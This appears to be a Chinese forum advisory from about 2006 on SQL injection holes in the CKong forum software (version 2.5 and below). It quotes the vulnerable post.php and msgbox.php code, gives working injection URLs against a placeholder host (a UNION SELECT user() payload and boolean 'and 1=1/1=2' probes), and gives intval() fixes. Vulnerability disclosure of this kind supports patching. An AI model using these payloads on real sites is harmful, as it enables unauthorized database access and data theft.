程序:心空论坛(CKong)
版本:<=2.5
类型:sql注射 漏洞分析 1、post.php <?
require_once("include/config.inc.php");
require_once('include/functions.inc.php');
$fid=intval($fid);
$tid=intval($tid);
$pid=intval($pid); ......... if(!$C_errormsg) {
if($postid) {
$sql='select post_content,post_date,user_name from '.__TAB_POST__.' where post_id='.$postid;
$result=$db->sql_query($sql);
$rows=$db->sql_fetchrow($result);
$qcontent=preg_replace("/\[quote\](.*)\[\/quote\]/is","",$rows['post_content']);
$qtime=date("Y-n-j G:i",$rows['post_date']);
$articlecontent=' 引用'.$rows['user_name'].'于'.$qtime."发表的文章: \n".$qcontent."
}
....... |
变量$postid过滤不严导致sql注射攻击,测试如下: http://www.xxxx.cn/bbs/post.php?tid=988&postid=6157%20and%201=2%20union%20select%20user(),2,1 |
2、msgbox.php < ?
.........
}elseif($action=='read') {
$sql="select msg_id from ".__TAB_MSG__." where user_name='".$_SESSION['username']."' and msg_id>$msgid and msg_kind='$kind' order by msg_id limit 1";
$result=$db->sql_query($sql);
$rows=$db->sql_fetchrow($result);
$nextmsgid=$rows['msg_id'];
.......... |
变量$msgid 过滤不严导致sql注射攻击,测试如下: http://www.xxxx.cn/bbs/msgbox.php?action=read&msgid=361%20and%201=1
http://www.xxxx.cn/bbs/msgbox.php?action=read&msgid=361%20and%201=2 |
漏洞修补 1、$postid=intval($postid);
2、$msgid=intval($msgid); |
| 
发表于 2006-12-29 16:42
| 
发表于 2007-1-4 05:08
|